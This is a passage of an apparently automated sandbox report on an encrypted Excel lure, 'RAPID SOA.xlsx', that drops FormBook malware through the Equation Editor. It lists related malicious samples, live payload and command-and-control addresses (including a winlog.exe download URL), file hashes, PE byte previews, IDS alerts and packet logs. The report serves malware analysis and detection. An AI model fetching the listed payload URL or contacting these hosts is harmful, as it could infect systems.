                                                                                                                                                          win32.exeGet hashmaliciousBrowse
                                                                                                                                                          • 184.168.131.241
                                                                                                                                                          DAT.docGet hashmaliciousBrowse
                                                                                                                                                          • 107.180.12.39
                                                                                                                                                          order pdf.exeGet hashmaliciousBrowse
                                                                                                                                                          • 184.168.131.241
                                                                                                                                                          Arch_2021_717-1562532.docGet hashmaliciousBrowse
                                                                                                                                                          • 192.169.223.13
                                                                                                                                                          ARCH_98_24301.docGet hashmaliciousBrowse
                                                                                                                                                          • 198.71.233.150
                                                                                                                                                          RFQ.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 198.71.232.3
                                                                                                                                                          bgJPIZIYby.exeGet hashmaliciousBrowse
                                                                                                                                                          • 184.168.131.241
                                                                                                                                                          E4Q30tDEB9.exeGet hashmaliciousBrowse
                                                                                                                                                          • 192.169.220.85
                                                                                                                                                          RevisedPO.24488_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                          • 107.180.34.198
                                                                                                                                                          02131.docGet hashmaliciousBrowse
                                                                                                                                                          • 166.62.28.133
                                                                                                                                                          mensaje_012021_1-538086.docGet hashmaliciousBrowse
                                                                                                                                                          • 198.71.233.47
                                                                                                                                                          Notice 8283393_829.docGet hashmaliciousBrowse
                                                                                                                                                          • 192.169.223.13
                                                                                                                                                          message_zdm.htmlGet hashmaliciousBrowse
                                                                                                                                                          • 184.168.131.241
                                                                                                                                                          SAMSUNG C&T UPCOMING PROJECTS19-027-MP-010203.exe.exeGet hashmaliciousBrowse
                                                                                                                                                          • 107.180.25.166
                                                                                                                                                          SINGLEHOP-LLCUSbgJPIZIYby.exeGet hashmaliciousBrowse
                                                                                                                                                          • 198.20.125.69
                                                                                                                                                          hmH9ZhBQFD.exeGet hashmaliciousBrowse
                                                                                                                                                          • 198.20.125.69
                                                                                                                                                          tuMCqH36OF.exeGet hashmaliciousBrowse
                                                                                                                                                          • 198.20.125.69
                                                                                                                                                          2021 DOCS.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 198.20.125.69
                                                                                                                                                          VCS58GQMhuCYghC.exeGet hashmaliciousBrowse
                                                                                                                                                          • 184.154.177.139
                                                                                                                                                          3KvCNpcQ6tvwKr5.exeGet hashmaliciousBrowse
                                                                                                                                                          • 184.154.177.139
                                                                                                                                                          ins.exeGet hashmaliciousBrowse
                                                                                                                                                          • 172.96.186.206
                                                                                                                                                          Invoice_#_76493.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 65.60.5.235
                                                                                                                                                          Report 290.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 65.60.5.235
                                                                                                                                                          3v3Aosgyxw.exeGet hashmaliciousBrowse
                                                                                                                                                          • 198.20.125.69
                                                                                                                                                          Inv.exeGet hashmaliciousBrowse
                                                                                                                                                          • 172.96.186.206
                                                                                                                                                          http://mckeepropainting.com/.adv3738diukjuctdyakbd/dhava93vdia11876dkb/ag38vdua3848dk/sajvd9484auad/ajd847vauadja/101kah474sbbadad/wose/Paint20200921_2219.pdf.htmlGet hashmaliciousBrowse
                                                                                                                                                          • 198.143.164.252
                                                                                                                                                          #Ud83d#Udcde_8360.htmGet hashmaliciousBrowse
                                                                                                                                                          • 107.6.141.50
                                                                                                                                                          http://getfreshnews.com/nuoazaojrnvenpyxyseGet hashmaliciousBrowse
                                                                                                                                                          • 184.154.108.232
                                                                                                                                                          http://iaaoaot.angelx97.xyz/OCFAheVlOOWYzT2RoWDEvaFEGet hashmaliciousBrowse
                                                                                                                                                          • 172.96.186.242
                                                                                                                                                          Invoices.exeGet hashmaliciousBrowse
                                                                                                                                                          • 107.6.134.138
                                                                                                                                                          Request Quotation.exeGet hashmaliciousBrowse
                                                                                                                                                          • 107.6.134.138
                                                                                                                                                          F9FX9EoKDL.exeGet hashmaliciousBrowse
                                                                                                                                                          • 198.20.125.69
                                                                                                                                                          All Open.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 198.20.125.69
                                                                                                                                                          faithful.exeGet hashmaliciousBrowse
                                                                                                                                                          • 173.236.29.82
                                                                                                                                                          VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNCREDIT NOTE DEBIT NOTE 27.1.2021.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.141.138.122
                                                                                                                                                          INVOICE PACKING LIST E2021010003 EMS-57177B.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.99.1.173
                                                                                                                                                          QUOTATIONNM868BFK.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.141.138.132
                                                                                                                                                          inquiry19117030.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.141.138.133
                                                                                                                                                          0113 INV_PAK.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.141.138.125
                                                                                                                                                          SQ_0738759.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.99.1.145
                                                                                                                                                          payment advice.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.141.138.127
                                                                                                                                                          PAYMENT LIST .xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.99.1.149
                                                                                                                                                          NEW ORDER.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.141.138.127
                                                                                                                                                          Clntnjk.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.145.252.55
                                                                                                                                                          Inquiry_73834168_.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.125.191.187
                                                                                                                                                          Factura.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.145.252.55
                                                                                                                                                          PO097385.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.99.1.172
                                                                                                                                                          BANK FORM.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.141.138.128
                                                                                                                                                          BSL 21 PYT.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.141.138.123
                                                                                                                                                          COSU6283389840.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.125.191.208
                                                                                                                                                          SQ_07937.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.99.1.172
                                                                                                                                                          Payment Ref SW2345.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.141.138.122
                                                                                                                                                          inquiry 19117030P.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.141.138.132
                                                                                                                                                          Request.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.141.138.119

                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                          No context

                                                                                                                                                          Dropped Files

                                                                                                                                                          No context

                                                                                                                                                          Created / dropped Files

                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe
                                                                                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):937984
                                                                                                                                                          Entropy (8bit):7.645207290087545
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:lVxP6Bd6pjWahwCXuCxlymspo3LnbvHsXdvRpJp0X/VwbN4+vtE+LtZ/NRMiWitP:DxP6Bd6VeGltLn7Hszp709wqYTfV
                                                                                                                                                          MD5:A9AA5937E09501E97E40E0FCF97FAC55
                                                                                                                                                          SHA1:502B58EC5259BC954F91CFC8A6E11010453DF819
                                                                                                                                                          SHA-256:689FFE9EA264100EB4D4CAC903A987565546976883721729F99AC40C049998E0
                                                                                                                                                          SHA-512:DB774ABB820DF5146C5EC4D69448681D2BB053BD44544CEBD90C01BCFCC682B9A61C207BE2D89412F442CFC73F1FEDD8F4821769FBEFB1B54D400AF715C4697B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          Reputation:low
                                                                                                                                                          IE Cache URL:http://chise2neversndywalka.dns.army/chnsfrnd2/winlog.exe
                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..`..............P..D...........b... ........@.. ....................................@.................................xb..O.................................................................................... ............... ..H............text....B... ...D.................. ..`.rsrc................F..............@..@.reloc...............N..............@..B.................b......H........C...[...........................................................0............(....(..........(.....o.....*.....................( ......(!......("......(#......($....*N..(....op...(%....*&..(&....*.s'........s(........s)........s*........s+........*....0...........~....o,....+..*.0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*&..(1....*...0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\10501531.jpeg
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):48770
                                                                                                                                                          Entropy (8bit):7.801842363879827
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                          MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                          SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                          SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                          SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                          Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3EE8CDF0.jpeg
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):48770
                                                                                                                                                          Entropy (8bit):7.801842363879827
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                          MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                          SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                          SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                          SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                          Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C310A0EB.emf
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):652496
                                                                                                                                                          Entropy (8bit):2.891642212184685
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:W34UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyiu50yknG/qc+H:Y4UcLe0JOqoQZR8MDdATCR3tSUjqcA
                                                                                                                                                          MD5:F1C8201AF872FF8F2C5BCF33ED798052
                                                                                                                                                          SHA1:A781E089AD290DAAA95CBB711368879FC86827F4
                                                                                                                                                          SHA-256:36AB611867034B321D265301103C0067609C7A3E2E1A9911F3B9CEF424878A4E
                                                                                                                                                          SHA-512:C311AC11FEDBB62B911E88E77DA187C1878B1DB3BF8944919C7EAFE2D5395193A4CD0750B1763776AC07AA19D52C436F2B492C256A554FBDEA7936A74F79DDD7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview: ....l...........:...............e@...&.. EMF........+...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................6...(...%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................-...-.......-...-..N.R..-...-.....t.-...-..N.R..-...-. ....y.0..-...-. .........y..z.0"...........O......................0........X...%...7...................{ .@................C.a.l.i.b.r...............-.X.....-.8.-..2.0........t.-.t.-..{.0......-...y.dv......%...........%...........%...........!.......................6...(...F...(.......GDIC............<...........F...4...(...EMF+*@..$..........?...........?........F...........EMF+.@...........................................PNG........IHDR..............0V.....sRGB.........gAMA......a.....pHYs......
                                                                                                                                                          C:\Users\user\Desktop\~$RAPID SOA.xlsx
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):330
                                                                                                                                                          Entropy (8bit):1.4377382811115937
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                          MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                          SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                          SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                          SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                          Malicious:true
                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                          Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                          C:\Users\Public\vbc.exe
                                                                                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):937984
                                                                                                                                                          Entropy (8bit):7.645207290087545
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:lVxP6Bd6pjWahwCXuCxlymspo3LnbvHsXdvRpJp0X/VwbN4+vtE+LtZ/NRMiWitP:DxP6Bd6VeGltLn7Hszp709wqYTfV
                                                                                                                                                          MD5:A9AA5937E09501E97E40E0FCF97FAC55
                                                                                                                                                          SHA1:502B58EC5259BC954F91CFC8A6E11010453DF819
                                                                                                                                                          SHA-256:689FFE9EA264100EB4D4CAC903A987565546976883721729F99AC40C049998E0
                                                                                                                                                          SHA-512:DB774ABB820DF5146C5EC4D69448681D2BB053BD44544CEBD90C01BCFCC682B9A61C207BE2D89412F442CFC73F1FEDD8F4821769FBEFB1B54D400AF715C4697B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..`..............P..D...........b... ........@.. ....................................@.................................xb..O.................................................................................... ............... ..H............text....B... ...D.................. ..`.rsrc................F..............@..@.reloc...............N..............@..B.................b......H........C...[...........................................................0............(....(..........(.....o.....*.....................( ......(!......("......(#......($....*N..(....op...(%....*&..(&....*.s'........s(........s)........s*........s+........*....0...........~....o,....+..*.0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*&..(1....*...0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....

                                                                                                                                                          Static File Info

                                                                                                                                                          General

                                                                                                                                                          File type:CDFV2 Encrypted
                                                                                                                                                          Entropy (8bit):7.996585790817502
                                                                                                                                                          TrID:
                                                                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                          File name:RAPID SOA.xlsx
                                                                                                                                                          File size:2211328
                                                                                                                                                          MD5:80e9c5fd1d11fa266b7263599c54a465
                                                                                                                                                          SHA1:c3d2ddda42a6e1915174b4c496b3da3bd3ad4b5e
                                                                                                                                                          SHA256:8cce72a111107f7a07477f7ef696e1edca5ec2ede9a7a4a3a3367f72544025f7
                                                                                                                                                          SHA512:78ee34df5faca29529abac7dec1e3bf99e563511b97db3f0da21e6ec8181d90a63e0998473b94de1658512f3b95d8531f19f0541209a1503a8df19aa9cc9b380
                                                                                                                                                          SSDEEP:49152:3AkmxrN2BlISyI+lxtv6fLQZYSkKS4wJGN8cSjyi5:3yrETISyI+jt6UGGNb7c
                                                                                                                                                          File Content Preview:........................>..................."...................................................................................|.......~...............z.......|.......~...............z.......|.......~......................................................

                                                                                                                                                          File Icon

                                                                                                                                                          Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                          Static OLE Info

                                                                                                                                                          General

                                                                                                                                                          Document Type:OLE
                                                                                                                                                          Number of OLE Files:1

                                                                                                                                                          OLE File "RAPID SOA.xlsx"

                                                                                                                                                          Indicators

                                                                                                                                                          Has Summary Info:False
                                                                                                                                                          Application Name:unknown
                                                                                                                                                          Encrypted Document:True
                                                                                                                                                          Contains Word Document Stream:False
                                                                                                                                                          Contains Workbook/Book Stream:False
                                                                                                                                                          Contains PowerPoint Document Stream:False
                                                                                                                                                          Contains Visio Document Stream:False
                                                                                                                                                          Contains ObjectPool Stream:
                                                                                                                                                          Flash Objects Count:
                                                                                                                                                          Contains VBA Macros:False

                                                                                                                                                          Streams

                                                                                                                                                          Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:64
                                                                                                                                                          Entropy:2.73637206947
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                          Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                          Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:112
                                                                                                                                                          Entropy:2.7597816111
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                          Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                          Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:200
                                                                                                                                                          Entropy:3.13335930328
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                          Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                          Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x6DataSpaces/Version
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:76
                                                                                                                                                          Entropy:2.79079600998
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                          Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                          Stream Path: EncryptedPackage, File Type: data, Stream Size: 2190088
                                                                                                                                                          General
                                                                                                                                                          Stream Path:EncryptedPackage
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:2190088
                                                                                                                                                          Entropy:7.99990652787
                                                                                                                                                          Base64 Encoded:True
                                                                                                                                                          Data ASCII:. k ! . . . . . N . . . + 8 . . . U . . . . . v . . M n . w 3 " F y w . D l . . . . j . . . # % N . J = % . . . ^ . . . m ; . . . . . = . G > . . h T + N 0 . 3 . . . h . . . . . h T + N 0 . 3 . . . h . . . . . h T + N 0 . 3 . . . h . . . . . h T + N 0 . 3 . . . h . . . . . h T + N 0 . 3 . . . h . . . . . h T + N 0 . 3 . . . h . . . . . h T + N 0 . 3 . . . h . . . . . h T + N 0 . 3 . . . h . . . . . h T + N 0 . 3 . . . h . . . . . h T + N 0 . 3 . . . h . . . . . h T + N 0 . 3 . . . h . . . . . h T + N 0 .
                                                                                                                                                          Data Raw:00 6b 21 00 00 00 00 00 4e e4 df fa 2b 38 ba c8 d9 55 2e cf dc e2 8c 76 83 d7 4d 6e 8b 77 33 22 46 79 77 98 44 6c bb df 82 e2 6a c0 d1 c9 23 20 25 4e 12 4a 3d 25 05 ea ba 5e b6 f8 10 6d 3b de e5 aa be e9 3d 7f 47 3e d7 12 68 54 2b 4e 30 d7 33 a4 b3 a4 68 ef eb d8 d7 12 68 54 2b 4e 30 d7 33 a4 b3 a4 68 ef eb d8 d7 12 68 54 2b 4e 30 d7 33 a4 b3 a4 68 ef eb d8 d7 12 68 54 2b 4e 30 d7
                                                                                                                                                          Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                          General
                                                                                                                                                          Stream Path:EncryptionInfo
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:224
                                                                                                                                                          Entropy:4.52699937492
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . ] s . . j c . . . . a . . F . . . . . . % . . . . = . . . 7 . 8 . . . . B h s . . z . . [ . $ 0 . p . . . . . l P . [ . . . [ . . \\ A "
                                                                                                                                                          Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                          Network Behavior

                                                                                                                                                          Snort IDS Alerts

                                                                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                          01/27/21-08:00:38.597899TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.22184.168.131.241
                                                                                                                                                          01/27/21-08:00:38.597899TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.22184.168.131.241
                                                                                                                                                          01/27/21-08:00:38.597899TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.22184.168.131.241
                                                                                                                                                          01/27/21-08:01:16.594680TCP1201ATTACK-RESPONSES 403 Forbidden804917034.102.136.180192.168.2.22

                                                                                                                                                          Network Port Distribution

                                                                                                                                                          TCP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Jan 27, 2021 07:59:29.445605993 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:29.667831898 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:29.668056965 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:29.668466091 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:29.891381979 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:29.891434908 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:29.891472101 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:29.891511917 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:29.891669035 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:29.891695023 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.112736940 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.112776995 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.112812042 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.112850904 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.112878084 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.112911940 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.112942934 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.112970114 CET8049167103.125.191.208192.168.2.22
